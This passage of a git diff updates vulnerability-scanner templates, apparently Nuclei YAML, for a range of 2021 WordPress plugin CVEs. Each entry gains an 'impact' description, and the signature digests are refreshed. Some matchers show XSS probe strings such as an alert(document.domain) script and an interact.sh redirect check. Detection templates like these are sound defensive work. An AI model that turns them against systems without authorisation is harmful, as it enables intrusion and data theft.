           - 'contains(body, "<script>alert(document.domain);</script>") && contains(body, "invitaion-code-table")'
         condition: and
-# digest: 4a0a0047304502206eed6d7ff109de0374b40812f2c065e93e1aa5febab11feb1a5fd54bfcf8a9ae0221008a35d0d38096882a54d9d48b2548b7027bfa655f026bc4fd666375714af30009:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204bb93a9157ba765c83f99d6048a3ba626f963f961533f7febdd379b717ac1e4c022100abb5f0e8cf35947911b6ec62ce119d873aa88f97913db86d0be6c2c0dbec78a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml
index 866d3882ae..a0cfb96b93 100644
--- a/http/cves/2021/CVE-2021-24245.yaml
+++ b/http/cves/2021/CVE-2021-24245.yaml
@@ -5,6 +5,8 @@ info:
   author: edoardottt
   severity: medium
   description: WordPress Stop Spammers plugin before 2021.9 contains a reflected cross-site scripting vulnerability. It does not escape user input when blocking requests (such as matching a spam word), thus outputting it in an attribute after sanitizing it to remove HTML tags.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
   remediation: |
     Update to the latest version of the WordPress Stop Spammers plugin (2021.9 or later) to mitigate this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210080c3c12be56c854518cfbebe42ea4876b60aecd31cede3f91951d3ae98df1fdd022066dd59598651058e63beaefad910dbc71f6af4dabb08c6b682562c3814f4e11a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205317db67e325351e198b7bf8ac705ed649d37d175aa722d1f7650958028eb80a022100eac09cebf55a76e9745ae7fa9bb3dff365a03700022e126bc1a6b61825e79ee5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml
index 85e063d16a..222318b24d 100644
--- a/http/cves/2021/CVE-2021-24274.yaml
+++ b/http/cves/2021/CVE-2021-24274.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDK
   severity: medium
   description: WordPress Supsystic Ultimate Maps plugin before 1.2.5 contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of the tab parameter on the options page before outputting it in an attribute.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update the WordPress Supsystic Ultimate Maps plugin to version 1.2.5 or later to mitigate the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ca95052ce642e3ed8f026d96015bfc7485c821fd03ef6e2ba258edcde9793140022070a313437d97e41b4ad1162207c9b66f42ddcc0a9e876fc657c60f63874b04b1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fd2d5b8327417a9f74fd6a66659d658dcdc13d045794d0452c0578189ecf624102207f07dd476f6e24753a835e1d1cb06cb06a6c13a2c7e3df1f909dfaa067851270:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml
index 473ed39506..71c5903c12 100644
--- a/http/cves/2021/CVE-2021-24275.yaml
+++ b/http/cves/2021/CVE-2021-24275.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDK
   severity: medium
   description: WordPress Popup by Supsystic before 1.10.5 did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected cross-site scripting issue.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to Popup by Supsystic version 1.10.5 or later to mitigate the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221008fbd0f51d342487d7b7f9da2988925d642d70c01353d473897f12e449a4f6af302201ff7edf573b7e062b262f1afbcfe3f3c9c33f1a4c8973fc9e74e7ee82d7a9dfd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022075efce5c4ffd442170b8ed76cee4d1b31c9e1f926cfcbeb58bd2c0d96d308c0b02200496eb4fab46891ebe285ffe0525e043f5dfef55b70a1439d5e72445fe6d27ad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml
index f9a2b245fc..2b63b0e3cb 100644
--- a/http/cves/2021/CVE-2021-24276.yaml
+++ b/http/cves/2021/CVE-2021-24276.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDK
   severity: medium
   description: WordPress Supsystic Contact Form plugin before 1.7.15 contains a cross-site scripting vulnerability. It does not sanitize the tab parameter of its options page before outputting it in an attribute.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress Supsystic Contact Form plugin (1.7.15 or higher) to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210092ee3b68c61b7f43cdc3a6962e04a7b1dbe8d9dc47b08294a6b82f38d1de690b0220312e5ce26589a1457b7736e63f5ebcc116bcdc81e2b13ac4128196769a7f47bd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009d01ddb2e22f5bcb4a3d442bb795ab62be6b78fef0cec2b5ae5f4ecafc6ad141022100a9f0384f337067125a9bc47255900bcf2e0df3eaebf6e1c8f38eeb6f9fc926f7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml
index 068a5ac729..a9b9797f0e 100644
--- a/http/cves/2021/CVE-2021-24278.yaml
+++ b/http/cves/2021/CVE-2021-24278.yaml
@@ -5,6 +5,8 @@ info:
   author: 2rs3c
   severity: high
   description: WordPress Contact Form 7 before version 2.3.4 allows unauthenticated users to use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.
+  impact: |
+    Attackers can exploit this vulnerability to perform actions on behalf of authenticated users, leading to potential data breaches or unauthorized access.
   remediation: |
     Update WordPress Contact Form 7 plugin to version 2.3.4 or later to fix the Arbitrary Nonce Generation vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
         regex:
           - '"nonce":"[a-f0-9]+"'
         part: body
-# digest: 490a0046304402204b9a4fa18a8c80c91fd7570444cc75a8f0c8bdbbc92ef457cb73607351593b1f022034bfa87b5e37f5a3e9c8a7caf16bda1730f6d5288f322d235736e3b5c7d01eb8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c79df4c6ecec7ae5ab5b6a1fffd09ba9f00a8b6b726bffd5bc10543a407832550221009ed93094b4bc1404ba860023fcd37907fb1f5744d7f6c277e18fbef6e68e95c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml
index 3f0fca79a1..f869a9c83e 100644
--- a/http/cves/2021/CVE-2021-24284.yaml
+++ b/http/cves/2021/CVE-2021-24284.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress website.
   remediation: |
     Update to the latest version of Kaswara Modern VC Addons plugin (>=3.0.2) to mitigate this vulnerability.
   reference:
@@ -74,4 +76,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220533d64e38b67268c6ac01b12cfc8f3bc91358abae56e0a28de309d65c0dcc8cb02204f22696a3f8d478f8c433eb69cbd60cc46e6dc6554b91930069e150581489608:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ffcf022febfcf2bd04fbe66d0da1dfd526cc10280253d9ed70d83f9f43ff64cd022008f245b727044d95ced73f35ab8814479385d7b469f7e58e604c3b594674a379:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml
index 299b91d9ae..68bd1eb3d1 100644
--- a/http/cves/2021/CVE-2021-24285.yaml
+++ b/http/cves/2021/CVE-2021-24285.yaml
@@ -5,6 +5,8 @@ info:
   author: ShreyaPohekar
   severity: critical
   description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in the WordPress Car Seller - Auto Classifieds Script.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022047be2ad5d4201d31c2f941b317c24bb8d6c1a2ae79a444877eeecfb9875862b2022100b2bf757791f8ca404499c8faa1429089a5cb89780fefa3439aeebfd865fc4434:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100dcf2767baba67e3e926fc1914391deb66baaac9c2b53f09e8df75f72c1912f6702201940e1784ae8f36d2bde3d5716aece2a31e2af9b773a25c5f3b0f08a1e06f1c5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml
index f83510813b..9f911f4459 100644
--- a/http/cves/2021/CVE-2021-24287.yaml
+++ b/http/cves/2021/CVE-2021-24287.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Select All Categories and Taxonomies plugin before 1.3.2 contains a cross-site scripting vulnerability. The settings page of the plugin does not properly sanitize the tab parameter before outputting it back. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Fixed in version 1.3.2.
   reference:
     - https://www.exploit-db.com/exploits/50349
@@ -47,4 +49,4 @@ http:
           - 'contains(body_2, "alert(document.domain)")'
           - 'contains(body_2, "Set up the taxonomies")'
         condition: and
-# digest: 4a0a004730450220136380e0bc93825d9ed38b195aafbb1f83513d96f4f1b5fdfef2792e580743720221008d23eb0ed6c74728a2769320086c22d1f41585be2d9743f3c18d4e528f61f3bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206e4b0ec6148b6a1b3ca48959e63d42fe4b73e096d9efd1ccf58f4e4b46ac1efa02201840c2de0bd02dc79cdbb26f165e541f3311a30185f33f0ca8702c53f10b97c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml
index 1ef84c8287..df6c9a38f9 100644
--- a/http/cves/2021/CVE-2021-24288.yaml
+++ b/http/cves/2021/CVE-2021-24288.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
   remediation: |
     Update the AcyMailing plugin to version 7.5.0 or later to fix the open redirect vulnerability.
   reference:
@@ -35,4 +37,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 480a00453043021f72502ed4db4bf8efc077105f6b54a445f5bb5ae4cedad20f3392789fff2ced022014b41e74b17189a25646f84f96144dce2e99a2b35e3d26e5da17aa52c1c24949:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100dd1755227dd2414f1eba8613e01950bfadd2745819199303b8207d684cd3948e022100f14df3a5acd2bea1a7ef044aaf94c3487f14d3925cb34ec73c2e7b6ec6c3e787:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml
index a483ebea2a..13f83867b2 100644
--- a/http/cves/2021/CVE-2021-24291.yaml
+++ b/http/cves/2021/CVE-2021-24291.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Photo Gallery by 10Web plugin before 1.5.69 contains multiple reflected cross-site scripting vulnerabilities via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action, available to both unauthenticated and authenticated users.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update WordPress Photo Gallery by 10Web to version 1.5.69 or later to mitigate the vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ea332bc0cadc2a762e03c05727f6b4be2b07e14a1f8796cf72f23802803ac7ba02205b54a6b110f64b0a72d3c9256fe09a3c6ad9f6e1a8cfcd56a0702ffde7793e38:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205d64fa1dcce68de5bea2a9b20ce7e85d56e49ab15503fd4eb19ae8133e96c74002203fc73f4056106e096271ccb457bdd287adbc40ed5d69a5bf8990e3cab9b2ba90:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml
index 47dd41afba..f9dc597841 100644
--- a/http/cves/2021/CVE-2021-24298.yaml
+++ b/http/cves/2021/CVE-2021-24298.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Simple Giveaways plugin before 2.36.2 contains a cross-site scripting vulnerability via the method and share GET parameters of the Giveaway pages, which are not sanitized, validated, or escaped before being output back in the pages.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
   remediation: |
     Update to the latest version of the WordPress Simple Giveaways plugin (2.36.2 or higher) to mitigate the vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220038171ad65b64cfe3499abc3cf8f068d9cb30bfd3fa8311fa5481e37c57cf80202200d2bb3a2b7a138b2aefbbf06ed4f106f075034d1f7680bafb719d927f22118a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cfefc915aa204f79aae86ee16b0793ecd8291ebe1a34cb7004089ccfbfc0db7002207712c5d394dfee90a930b2cd11a890b2704e30f48c8fe4edd31044835555c35b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24300.yaml b/http/cves/2021/CVE-2021-24300.yaml
index c8da92feb4..52b07314a1 100644
--- a/http/cves/2021/CVE-2021-24300.yaml
+++ b/http/cves/2021/CVE-2021-24300.yaml
@@ -5,6 +5,8 @@ info:
   author: cckuailong
   severity: medium
   description: WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update WordPress WooCommerce plugin to version 1.13.22 or later to mitigate the vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220110fc7cc3fe4342b349ec9a4994c461fd52c91926ef6d0945c24d9d7a96b4606022050769e25619afab8fe4812c473ea492ebf5621d3cdc4e2eaf86a545ed90889c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c061a6d7eef974621d9562340524db8434adf4548b96e1b84f82da3bd0dd1aec022100e280f8eaa273042e31677a1888df194b793576dca159d33c81a1d98fe5aa8326:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml
index eef4cf860c..2f3c738033 100644
--- a/http/cves/2021/CVE-2021-24316.yaml
+++ b/http/cves/2021/CVE-2021-24316.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: WordPress Mediumish theme 1.0.47 and prior contains an unauthenticated reflected cross-site scripting vulnerability. The 's' GET parameter is not properly sanitized by the search feature before it is output back on the page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress Mediumish Theme plugin (1.0.47 or higher) to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022043bfc377a13db73bc19abf4b2c5a40ef396b49c55699f122135ad45e8284a81a022003ace5bf80be1c08cf936b3019d7776172214dde103753f0dae199949a7623ea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d27a7c91b0816e541f4d33766592bc824df495bbb7621846067db574fdce2ecb02201263334e27a638162c8a71299512c9aded4083c88b2768c6c47eeed6849c9bda:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml
index a3c617abe5..1d344c9c7b 100644
--- a/http/cves/2021/CVE-2021-24320.yaml
+++ b/http/cves/2021/CVE-2021-24320.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Bello Directory & Listing theme before 1.6.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape the listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameters in the ints listing page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update WordPress Bello Directory & Listing Theme to version 1.6.0 or later to mitigate the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b4cc7fc8623fadffab39ae3ff2019c45fdc244039922bcc9812375b79c75410d022100ff26cd313c3b0cac010805788515c72143f37400fb868685a5a3d2b2d38d17fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202bcfc93040f9a1a6ba42ff251b70ae50aed3a66ca2bdfb8735387a637eb796ab0221008827e07773625082ac8c308caafb4f0f55381bf9b9742da74cc9a3dd27b91d02:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml
index f314c6894f..62650cc0db 100644
--- a/http/cves/2021/CVE-2021-24335.yaml
+++ b/http/cves/2021/CVE-2021-24335.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Car Repair Services & Auto Mechanic before 4.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the serviceestimatekey parameter before outputting it back in the page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update to the latest version of the WordPress Car Repair Services & Auto Mechanic Theme (version 4.0 or higher) to mitigate the XSS vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210095c7769380948306cea8d6b54b3ec51b0425a6c0ab0e53116d41ba3ddcab5730022004c64c71f7d0d1b768d6d49d3344e620f778e7896e81ccaeee9a9a08c0e88036:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022011a31f233855d6bb57a2587bc5d63dd3ed5233ce2d6b5056d8ebfa445544365602204cdcbbe6216cafaddab178c292efea9b1575248b0762ddcfbab2a5638363af1a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml
index 8444d0b76a..b84d521090 100644
--- a/http/cves/2021/CVE-2021-24342.yaml
+++ b/http/cves/2021/CVE-2021-24342.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update to the latest version of the WordPress JNews Theme (>=8.0.6) to mitigate the XSS vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100cad6b0b932d623f4564c939f06b5280a8a952af9585f11047e25d7e292637cb8022100ed32239b87de4459aed3c83aa9c674dcf6e5d1168849ab03719b47eaf781c9ae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022067bc6373c693d64484db2796a0d91f1098b4be72548b988d5a3c5f8a2eab4a5102203f756e6b21f76730d83f086fa6df2ca5e37f835f2a62084c65b0f162cabddc68:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24347.yaml b/http/cves/2021/CVE-2021-24347.yaml
index 737f9c9aea..cc0745d5e9 100644
--- a/http/cves/2021/CVE-2021-24347.yaml
+++ b/http/cves/2021/CVE-2021-24347.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress site.
   remediation: Fixed in version 4.22.
   reference:
     - https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a
@@ -99,4 +101,4 @@ http:
         regex:
           - name="cdm_upload_file_field" value="([0-9a-zA-Z]+)"
         internal: true
-# digest: 4a0a0047304502202039b864b4af470c4ff446fae7658be59757a35ed1adf217fc38dbd9df7f2c7c022100dd44bc163cbd3323e7943796db032c93a1100b72248e3716d5b8cf541205f449:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c64e5d978dadee4af48f6a69a59ea526c35c59a85f05b8886ca119518ea6b0d30221008f18b320d5bb229e016d870164b082c44fed0ccfee62f5eeb814cb9274d09f2a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml
index cde9cf80b9..cd0466389e 100644
--- a/http/cves/2021/CVE-2021-24351.yaml
+++ b/http/cves/2021/CVE-2021-24351.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress The Plus Addons for Elementor plugin before 4.1.12 is susceptible to cross-site scripting. The plugin does not properly sanitize some of its fields in the heplus_more_post AJAX action, which is exploitable by both unauthenticated and authenticated users. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update to the latest version of WordPress The Plus Addons for Elementor plugin (4.1.12 or higher) to mitigate the vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100831c5f55cfde2411315d492975666d3d99eb3f902a29095b10c565427805345b022100b0e0714dcfd94c1ca3605c84878ff223108aae717c33ec86324d5f638fdabe78:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b30149b0d77f7763b1b33e96feb289f91a70e2d7656a8efa3c4891b292a9783c0221009b29c379f781a280e5043d76b101b1cff8b737d0c05ffac344393a4852ca6ddf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml
index 2db8572e5d..6a486dc65d 100644
--- a/http/cves/2021/CVE-2021-24358.yaml
+++ b/http/cves/2021/CVE-2021-24358.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: medium
   description: WordPress Plus Addons for Elementor Page Builder before 4.1.10 did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an open redirect issue.
+  impact: |
+    This vulnerability can be exploited by attackers to trick users into visiting malicious websites, leading to potential phishing attacks or the execution of other malicious activities.
   remediation: |
     Upgrade Plus Addons for Elementor Page Builder to version 4.1.10 or later to mitigate the vulnerability.
   reference:
@@ -58,4 +60,4 @@ http:
           - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'
         internal: true
         part: header
-# digest: 490a0046304402201ddea0c444592e924a3c140252ffcd02c381101c6a0a1f9536ff3e12a85cceb002202654e100efb8fa5df477196b93e0a101b3aa4eaf8119e303ed965c6c7cfcc1e9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c74e93d8afffdde78b3387c019390c477e3a01daf2b22acce03dab70af189607022100d5264923a39d5519e0f2bbdd4bd6f5411314852b4ab43974aa5d6a07a6477836:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml
index 7109be9175..260c9d490d 100644
--- a/http/cves/2021/CVE-2021-24364.yaml
+++ b/http/cves/2021/CVE-2021-24364.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: WordPress Jannah theme before 5.4.4 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update the WordPress Jannah Theme to version 5.4.4 or later, which includes a fix for this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100944bebb22d517f922d3e5059ebbf7d88e836526ad2aef3bf969764705a2c4f97022100afe95dc0809145b8d70b9044e914803a2cb4725de914cc9cab9e9253f7e023c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100dbd02916dc87a092ffe945acd6685f372201a7f5beeaf01903e802e1cfd55ee6022035b4cdf510dd307172e4604aa411958170e3864351731dc6d0e67845ad4db256:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24370.yaml b/http/cves/2021/CVE-2021-24370.yaml
index a043196bab..2d6c7ed9b1 100644
--- a/http/cves/2021/CVE-2021-24370.yaml
+++ b/http/cves/2021/CVE-2021-24370.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Fancy Product Designer plugin before 4.6.9 is susceptible to an arbitrary file upload. An attacker can upload malicious files and execute code on the server, modify data, and/or gain full control over a compromised system without authentication.
+  impact: |
+    Attackers can upload malicious files and execute arbitrary code on the target system.
   remediation: |
     Update WordPress Fancy Product Designer plugin to version 4.6.9 or later to fix the vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502205f4f47cd87d577958bdd7c2e506b445a5bf37cb34ea57912daefe9ac46a0de31022100a3551fcdb92eb6f53e95ddf952a8327f4d85c345d576062a6956c7a469c522c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206917fb28c1704918e70589f1604c91cec4b04e9aea1dfc6371a18a7ebe467981022044fbd39affb33e9fe52dcd5d4ed12984b0270a43b4d638f5a44390d5777a163a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml
index cfce1fcf59..e534c2b093 100644
--- a/http/cves/2021/CVE-2021-24387.yaml
+++ b/http/cves/2021/CVE-2021-24387.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Pro Real Estate 7 theme before 3.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the ct_community parameter in its search listing page before outputting it back.
+  impact: |
